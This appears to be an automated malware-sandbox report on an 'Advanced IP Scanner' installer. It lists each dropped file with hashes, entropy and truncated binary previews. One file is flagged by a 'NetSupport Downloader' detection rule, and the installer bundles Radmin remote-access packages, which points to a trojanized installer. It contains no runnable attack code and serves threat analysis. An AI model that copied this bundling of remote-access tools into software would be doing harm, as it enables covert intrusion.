SHA-512:	D6A224A13C9E301DA124D660FD30B7FBBC8BADBA6484D39D1FDAC5410D44C48A963EA1182237FD72AD77609898C8F713CB22DCD7E20EA037BFAE6B8E25DB25C3
Malicious:	false
Preview:	<.d....!..`...B..........\....;...^...;.......;..!....;.."....;..E....O..^....[..Z....^..1....^..VL..(5......G.......H,..SB..K...B...N:.. ...V...G..._...`..............Sm...y..S........S.......Z......[....t..,O...t..TL...t..^y.....B....j.. ...5t......@...D...H5..\...f...1.......G....................~..4....`..9D...e..].......^.......... =...H...y...j..y......%..&V..0..&..+.......+.....v.+......+......+....().G....!..G....,..H0...^I.Hw9...Y.Hw9.....I....>.J6....$.J6......J6......J6...Ke.LD......L.b..^..M.S..CN.R.....\|.V....1..Wi...]..W.T.....Z.\|..U..[f3..X..gc......w0K..I...H...'5......_....T......."..6z...~..8... d..H9...T..0'..2....]......].......cm.9.E..Bj.L.#..f..M$o.....e.....\|.l8...8[...^..K...I....h......D.......V.......\...>...u..>......3..1S..l...MH......;..5.l..b..AV...)..y....Z....0..V.......U.......\_..tb..7>...............=......W%......?\|......Q..(....Vr.1V...+..R....3..W.<..b..f.~..#.......6...1....-...^..7....5...1..........c..H..;6...d..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\is-VT8NV.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	data
Category:	dropped
Size (bytes):	590271
Entropy (8bit):	7.998650752150742
Encrypted:	true
SSDEEP:	12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
MD5:	637FB65A1755C4B6DC1E0428E69B634E
SHA1:	FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
SHA-256:	B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
SHA-512:	F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
Malicious:	false
Preview:	.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.\|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q\|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.\|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.

C:\Program Files (x86)\Advanced IP Scanner\is-VU48S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18624
Entropy (8bit):	7.00674396465633
Encrypted:	false
SSDEEP:	192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
MD5:	906CB0C8ABA8342D552B0F37DDFD475F
SHA1:	A3CD528B9C212FEA97495A557A91D638B1608418
SHA-256:	582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
SHA-512:	27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\libeay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1180200
Entropy (8bit):	6.806814022865445
Encrypted:	false
SSDEEP:	24576:cC5LQc2ki3TeGT5jWZKbROjq69Afqg0tPoqqHVd4qP02mn:cOB21uZKbR0DACg0tPSVyR2mn
MD5:	C553D46852C7015A3DF581FBD2C02C3A
SHA1:	D768260F818EA400BE5AD8F86280FB92DD37F341
SHA-256:	F90FC5CD84EFE1F5AF152DF3FC95306782384DCBC738E5C383E705025C3B837B
SHA-512:	42FBFE51991BA7FCAECADFED89AADCD3EDA74E63FD80E4FE630EB6E4957DB179CC1B32F7CB46F5AFA4749E461CF4E11A723172DAF4035EE1FB3AF60D49F531A6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........T...:...:...:.....:.h.;...:.h.?...:.h.>...:.h.9...:..;...:...;.n.:..<...:......:..>...:..:...:......:..8...:.Rich..:.........................PE..L......]...........!.........p......?........................................@.......3....@.........................p?......l...h.......@...............(..........P9..T............................9..@...............d............................text............................... ..`.rdata...C.......D..................@..@.data...<........^..................@....rsrc...@............@..............@..@.reloc..............F..............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\mac_interval_tree.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1614189
Entropy (8bit):	5.107077482480661
Encrypted:	false
SSDEEP:	49152:p68vRRbvrqg2KwYbDmEZ3xm8JfAD2MGaYP63xwZjV4yhOKktsKCA4Zsdd:A
MD5:	7B844618B571CDACB552622844639A96
SHA1:	3103E22CC3EFE0B8EEB0F8664AF250BDF3FDA7C8
SHA-256:	8AA5F53559D9EDA03150CFDADC6273365311A3293631E7E467C4E881798A7885
SHA-512:	9BB645420DF1C61E8427D7A1E97067F4CC329F7A2CDB1B1957A0F05BC064967C3294DC3AE382C352A8DBB4EBF43612883C138216A3039012D37751F2EEB8A0BC
Malicious:	false
Preview:	000009FFFFFF XEROX CORPORATION.00000AFFFFFF OMRON TATEISI ELECTRONICS CO..00000BFFFFFF MATRIX CORPORATION.00000CFFFFFF Cisco Systems, Inc.00000DFFFFFF FIBRONICS LTD..00000EFFFFFF FUJITSU LIMITED.00000FFFFFFF NEXT, INC..000010FFFFFF SYTEK INC..000011FFFFFF NORMEREL SYSTEMES.000012FFFFFF INFORMATION TECHNOLOGY LIMITED.000013FFFFFF CAMEX.000014FFFFFF NETRONIX.000015FFFFFF DATAPOINT CORPORATION.000016FFFFFF DU PONT PIXEL SYSTEMS ..000017FFFFFF Oracle.000018FFFFFF WEBSTER COMPUTER CORPORATION.000019FFFFFF APPLIED DYNAMICS INTERNATIONAL.00001AFFFFFF ADVANCED MICRO DEVICES.00001BFFFFFF Novell, Inc..00001CFFFFFF BELL TECHNOLOGIES.00001DFFFFFF Cabletron Systems, Inc..00001EFFFFFF TELSIST INDUSTRIA ELECTRONICA.00001FFFFFFF Telco Systems, Inc..000020FFFFFF DATAINDUSTRIER DIAB AB.000021FFFFFF SUREMAN COMP. & COMMUN. CORP..000022FFFFFF VISUAL TECHNOLOGY INC..000023FFFFFF ABB INDUSTRIAL SYSTEMS AB.000024FFFFFF CONNECT AS.000025FFFFFF RAMTEK CORP..000026FFFFFF SHA-KEN CO., LTD..000027FFFFFF JAPAN

C:\Program Files (x86)\Advanced IP Scanner\msvcp140.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449280
Entropy (8bit):	6.670243582402913
Encrypted:	false
SSDEEP:	12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
MD5:	1FB93933FD087215A3C7B0800E6BB703
SHA1:	A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
SHA-256:	2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
SHA-512:	79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\pcre.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	300584
Entropy (8bit):	5.864906645133905
Encrypted:	false
SSDEEP:	6144:QAgKki4pTMgFCvy5KTgUZyV9uvJql0UBef4sdlruQ26MKXvP:QAlhPy5KTgsy+vMdUf4sv/B3
MD5:	E8D9421848C1DDEA1A74EBFDBE452C67
SHA1:	7F1302F2B64FF785ABF85F5A9579EA12E555233B
SHA-256:	3449DC8B0B476B3FA4F2EDB141D31A8FEF5D41C4E3393B592E0277861C622958
SHA-512:	2CA2AA65C0BC839120C9DBA540F478B244DAFBD485DB05102F36EEDB0C86192522CD28B0A16D85EBA949CE609D019E7F82F978EBBCBA31A1717C42B9A50A707A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.HYT..YT..YT...<..[T...<..ST...<..ST...<..ZT..P,..PT..YT..oT...=..LT...=..XT...=x.XT...=..XT..RichYT..........................PE..L...Ki.]...........!.........t......O........ ............................................@..........................`..r......x.......<............z..(.......,....U..8............................U..@............................................text............................... ..`.rdata...E... ...F..................@..@.data...,....p.......R..............@....idata...............T..............@..@.00cfg...............^..............@..@.rsrc...<............`..............@..@.reloc...............f..............@..B........................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\platforms\is-R93D4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1384488
Entropy (8bit):	6.46559466851362
Encrypted:	false
SSDEEP:	24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
MD5:	A95683988952CD21F5F6DE5318122B98
SHA1:	2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
SHA-256:	10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
SHA-512:	33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN... ... ... ..~.... ..k!... ..k%... ..k$... ..k#... ..n$... .{k!... ..n&... ..n!... ...!... .{k$... .{k%... .{k ... .{k.... .{k"... .Rich.. .........PE..L.....%^...........!................J.....................................................@.........................@...x...............@...............(...............T...............................@...............d............................text...J........................... ..`.rdata..............................@..@.data....V...@.......&..............@....qtmetad.............@..............@..P.rsrc...@............B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\platforms\qwindows.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1384488
Entropy (8bit):	6.46559466851362
Encrypted:	false
SSDEEP:	24576:z97oggy+GqjfB6aNrsNNyE8pXv7TXhLZKv+:Z7GGqlq0tXp
MD5:	A95683988952CD21F5F6DE5318122B98
SHA1:	2F8C94FC2CF0A9BDC61743541E94AB0DCC2840C0
SHA-256:	10CABD7EC4B4BDB4CAC85C905917B64DAD626DCABACBF32748217B129A3B2099
SHA-512:	33C8F7DAF9E13A91BA9C362AEFC944733B7C946AD042E1BBA1B7218B9B6500C5F04E8F3BCC3650CBAF2DA163F8A6DEB21AABCCFDEF8FBCC804B862E07B55CF89
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gN... ... ... ..~.... ..k!... ..k%... ..k$... ..k#... ..n$... .{k!... ..n&... ..n!... ...!... .{k$... .{k%... .{k ... .{k.... .{k"... .Rich.. .........PE..L.....%^...........!................J.....................................................@.........................@...x...............@...............(...............T...............................@...............d............................text...J........................... ..`.rdata..............................@..@.data....V...@.......&..............@....qtmetad.............@..............@..P.rsrc...@............B..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\printsupport\is-RSL5S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51240
Entropy (8bit):	6.51849694585826
Encrypted:	false
SSDEEP:	1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
MD5:	1184F4FB8EFAE468729C62787C9ED80B
SHA1:	A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
SHA-256:	C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
SHA-512:	2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I...........>................................a.................a......a......a.R....a......Rich...........PE..L.....%^...........!.....b...H.......h.............................................. U....@.................................D...........X...............(..............T..........................(...@............................................text...o`.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....qtmetad............................@..P.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\printsupport\windowsprintersupport.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	51240
Entropy (8bit):	6.51849694585826
Encrypted:	false
SSDEEP:	1536:Rjw/NzbbQqgujx+DUcde+Q/Zj1VyZbueH3hfa:RjH4ude+QRj1VyZbue1a
MD5:	1184F4FB8EFAE468729C62787C9ED80B
SHA1:	A06E3F759DC4BEE0B9BADEB7A5A67DFEEBBF141F
SHA-256:	C075C95D5153DE4005F0E6804EB4F783886D10B683712ED00EF09A6629D6917A
SHA-512:	2EF35E76F950218F3FABB3F53244366CC7DE6D61BA090F3C312EEA8B7457B239DAAE65D05FE3A0BD2A7236AFC4EB0434AEC7F8042E0C5DB1D118FE0E11E04F53
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I...........>................................a.................a......a......a.R....a......Rich...........PE..L.....%^...........!.....b...H.......h.............................................. U....@.................................D...........X...............(..............T..........................(...@............................................text...o`.......b.................. ..`.rdata...3.......4...f..............@..@.data...............................@....qtmetad............................@..P.rsrc...X...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\rserv35ml.msi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Server 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Server 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Server 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {BBD285CD-D1FE-41B1-B6B4-7FF7C27F553B}, Last Saved Time/Date: Thu Dec 14 03:24:15 2017, Create Time/Date: Thu Dec 14 03:24:15 2017, Last Printed: Thu Dec 14 03:24:15 2017, Code page: 1252, Template: Intel;1033
Category:	dropped
Size (bytes):	6313984
Entropy (8bit):	7.80157349747762
Encrypted:	false
SSDEEP:	98304:p4Yy6oWmNbrsXB52VA7/YLiIwyxDdYYUPe7fA8ScWmMJ5TpBpB22Omi58:pP1mdrIiVe/cwyxpF7fHScWLjTbedfi
MD5:	7DBF077665F632BEA55C0D88B7F301A3
SHA1:	D1D0215FC874F72228BDDAFAB9FBEE5B816737B2
SHA-256:	AA584952E31F9C521C2D57AF5FAAFA876E78C512A4DAF0A76E11695EA126558A
SHA-512:	90BD7F02A7838AD83B6CC0E287038568994E07D26B42E66BD0474ADFC6A82299B612CEF01E570FD27EBCFB54B912F333DF91879CD348E06718E3622918368E8F
Malicious:	false
Preview:	......................>...................a...............8...................................y.......~........................................................................................................................................................................................................................................ ... ...!...!..."..L...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p............................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D...x...F...X...H...J.......K...L.......V...O...P...Q...R...S...T...U...G...W...J...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Program Files (x86)\Advanced IP Scanner\rview35ml.msi (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, MSI Installer, Number of Characters: 0, Last Saved By: DavidHacker, Number of Words: 0, Title: Radmin Viewer 3.5.2 installation package, Comments: This installer contains the logic and data to install Radmin Viewer 3.5.2, Keywords: Installer,MSI,Database, Subject: Radmin Viewer 3.5.2, Author: Famatech, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 12 - Professional Edition 12.0, Revision Number: {FAB726D2-8076-4144-B0E6-C4FC2A838845}, Last Saved Time/Date: Thu Dec 14 03:24:44 2017, Create Time/Date: Thu Dec 14 03:24:44 2017, Last Printed: Thu Dec 14 03:24:44 2017, Code page: 1252, Template: Intel;1033
Category:	dropped
Size (bytes):	5409792
Entropy (8bit):	7.888464776356177
Encrypted:	false
SSDEEP:	98304:/YyLObvirO9mCdfl2nus7iOlkwAI2ljeoKleOA56VJJ8bXSUvmdMjGerZSJi:FGKrofl2xG1ICGleD6DJ8DSUv+EJZSJi
MD5:	8E36ECA249C08969EF5C0822928416D6
SHA1:	1937E555B760B4A3E13667BE189A9A9B9C9FAF8C
SHA-256:	052EE17B1544F3E1466DF561D7BAAA4BB694320803102C96FCD3560BEEB3B5C3
SHA-512:	C7B9DE31660CD56AAC2D30C3EF4E5C041E6A1108B3B058EA08C2C9A08AD235398E15AE5FDC76263476864BB964443035F383EA3CB82FFA715D8583ABEB9C5AB1
Malicious:	false
Preview:	......................>...................S...............8....................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-......./...0....................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)......+...,...-......./...0...1...2...3...4...5...6...7...E...I...:...;...<...=...>...?...@...A...B...C...D.......F...Y...H...J.......K...M...........W...P...Q...R...S...T...U...V...G...X.......Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Program Files (x86)\Advanced IP Scanner\service_probes (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	data
Category:	dropped
Size (bytes):	590271
Entropy (8bit):	7.998650752150742
Encrypted:	true
SSDEEP:	12288:FJRxPJ22FvSUzQI2XsdVYfVnFW4XG1s5x41ZRR8kd+O0p1mXuFm1ssGHw5AX+4nL:FSyaukwGf79ueU/RVd+l/1F/HL3nL
MD5:	637FB65A1755C4B6DC1E0428E69B634E
SHA1:	FBA4652B6DBE0948D4DADCEBF51737A738CA9E67
SHA-256:	B3B1FF7E3D1D4F438E40208464CEBFB641B434F5BF5CF18B7CEC2D189F52C1B6
SHA-512:	F8FE4083361386C806D95DF7BE83C83BAD07E2F2563290C343F0DF2FE6BCA8EAD1BE7E0B38B91C1689CE26E8E77FC753845A574DC5ECFD3ABF71AEAC966E21AD
Malicious:	false
Preview:	.&3[x..}y_.F........../N..1..a..`33.".,. K.$..0...n.%.......&.l..........h`.Y.7..0..+v.....0.b..il..N..G.m..?6.....^..}{....{.F..7.m.f.....5..`.[.w.....pl.:.0.#x._.1.r.....X...X.2}.......aT+.}x...%[e#..@%.........X"..\R.........sbK_ef..............:..Hg...q..F.......%...g..G...~..#....!.z..R.8.h...q._'...N8.]?..........4s}........5G.6...kj>.=...b..GS.K.o".......h....x...&..;..'s....;;.Z.T).....'......88h...c,k.>.g0..=L[.\|{..\.u.Qh!.-.G,F...w....`..:../...>.x....5.1b..([.......P..f..1r...]0.).`.W..[....HL..`h.n..BJ.0A3....OM......z0,.?L...x.....^..a....(..@R..)...c..;....$....(M......GW..@..T......3. .q\|;.a.y.c.w...@E#.O.U....m.7NxW..."As.v.II.@..."...1....3.B.s..`.E.3.8.@..siz)YbuQ...`...O.ES...^.bcvk.Pm ..4..s.....r:..G..`c.0..%zb.%.0..i.\|d...p.;ZO.k.-od#...$.`l^#.C.......M\$.\q.....}.LZO..&..+...L.}.]..u..'...v......;..;..."<=8.+.V....9E...X..m...`.13.j.......'....kS..F.....=@....."f.c.8......sP\...... hc..`~...........x.........G1.

C:\Program Files (x86)\Advanced IP Scanner\ssleay32.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	282664
Entropy (8bit):	6.463228483563671
Encrypted:	false
SSDEEP:	6144:ktT9k1wLFm2gcPHRGmRFQZvj/HXvC8CJXNMdyHNAe17LjuEnAZwjJOIaUB547PEa:ktT+1wLFm2gcPHRGmRFQZvj/HXvC1JX4
MD5:	BA337B8D1BC9F117F7605A2B79B10064
SHA1:	9F0502A9E8FE0F34F0DB2B7F6AE31278C1A9B60C
SHA-256:	EBE2A42C21F444D1E6A404694649522E3990C8A08EC9FDD28A5C390FDC873F79
SHA-512:	277529A67E4D4EF978A5F36294F9DAECA5C0A3651BFE0F97C4912ACB3FA588D99E1874AEE224F402EF91FF0A20612A251D1CE519E366FE7712F2696DBC096206
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5P.q1..q1..q1..xI..y1...V..s1..*Y..s1...V..}1...V..{1...V..s1..p\..r1..q1...0..p\..^1..p\..p1..p\w.p1..p\..p1..Richq1..........................PE..L......]...........!....."...........(.......@......................................5.....@.........................`...p$...........@..@............4..(....P...#......T...........................h...@............@...............................text.... .......".................. ..`.rdata......@.......&..............@..@.data....1..........................@....rsrc...@....@......................@..@.reloc...#...P...$..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\ucrtbase.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	900288
Entropy (8bit):	6.823623458577979
Encrypted:	false
SSDEEP:	24576:Nqaw9+lq6qElzORB37mV60TZAty7dmcvIZPoy4NJ8:Zw90dORBFAZjLy
MD5:	3E0303F978818E5C944F5485792696FD
SHA1:	3B6E3EA9F5A6BBDEDA20D68B84E4B51DC48DEB1D
SHA-256:	7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1
SHA-512:	C2874029BD269E6B9F7000C48D0710C52664C44E91C3086DF366C3456B8BCE0ED4D7E5BCFE4BDD3D03B11B8245C65F4B848B6DC58E6EA7B1DE9B3CA2FB3348BC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............`.`.`....`.a...`.`..`..:..`..:..`..:....`..:....`..:....`..:..`..:..`.Rich..`.................PE..L....:.U...........!................0.....................................................@A........................P,..f....2.......P...................<...`..dX..`...8...............................@............0...............................text............................... ..`.data...............................@....idata..d....0......................@..@.rsrc........P....... ..............@..@.reloc..dX...`...Z...&..............@..B................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	InnoSetup Log Advanced IP Scanner {FFA0FB35-59D6-4B0D-863C-1431EA12E295}, version 0x418, 6118283 bytes, 226546\37\user\376, C:\Program Files (x86)\Advanced IP Scanner
Category:	dropped
Size (bytes):	6118283
Entropy (8bit):	4.024290140131809
Encrypted:	false
SSDEEP:	49152:UhlFVfsWKHsBLL2NpPytQCiNQj716hKpKe2f8E2U/c:s
MD5:	DC6ED1014AF1072F1B921AEF65FCE079
SHA1:	A6E496747B953DBD192E23A3335ED11BD16E9DAA
SHA-256:	8EA3DE92CB9BC85FBEF6B63AB34B0BFB54E619132E12682E9E4308CA16FD6F9A
SHA-512:	3C74220A252D374BB866C55869E1DB8C21D6730F0F3A92AD2D59FA27A2FC7123DE45D8F46A91940254A4AEAAA62AA9CC82976D2EDF8E4D460AF05CD5D701C432
Malicious:	true
Yara Hits:	Rule: JoeSecurity_NetSupportDownloader, Description: Yara detected NetSupport Downloader, Source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, Author: Joe Security
Preview:	Inno Setup Uninstall Log (b)....................................{FFA0FB35-59D6-4B0D-863C-1431EA12E295}}.........................................................................................Advanced IP Scanner......................................................................................................................[].................................................................................................................f............e0\|...............2.2.6.5.4.6......j.o.n.e.s......C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.d.v.a.n.c.e.d. .I.P. .S.c.a.n.n.e.r....................... ......\...T..IFPS....#........................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM.........TEXECWAIT.........TSETUPSTEP.....u...

C:\Program Files (x86)\Advanced IP Scanner\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3329597
Entropy (8bit):	6.563292325267208
Encrypted:	false
SSDEEP:	49152:AdJYVM+9JtzZWnoS2VC23aun8+f5KuG2OY9IG9ivyv2cLx1RQu3334PK:yJYVM+LtVt3P/KuG2ONG9iqLRQu3334S
MD5:	3EAAE4BAD7C2BD8319CDCDFCAAC03B7E
SHA1:	3FA168131A590D0EB7C80B6F321304A2070985E6
SHA-256:	938C1F61125871F4A0B8F2382F29C420443DD755F01A596996E444A360CA21A3
SHA-512:	98D76D607D8B2D44B53B8926BD1C58E7249D63C80066C34D420D0CCA3A9190072AAD21A4C073E12AE4F70086F8516621B6D2B3170D9519C1F51EB46B888CEAC4
Malicious:	false
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.......................................@..........................@3...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text............................. ..`.itext..$.......0................. ..`.data................*.............@....bss.....\|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

C:\Program Files (x86)\Advanced IP Scanner\vcruntime140.dll (copy)

Download File

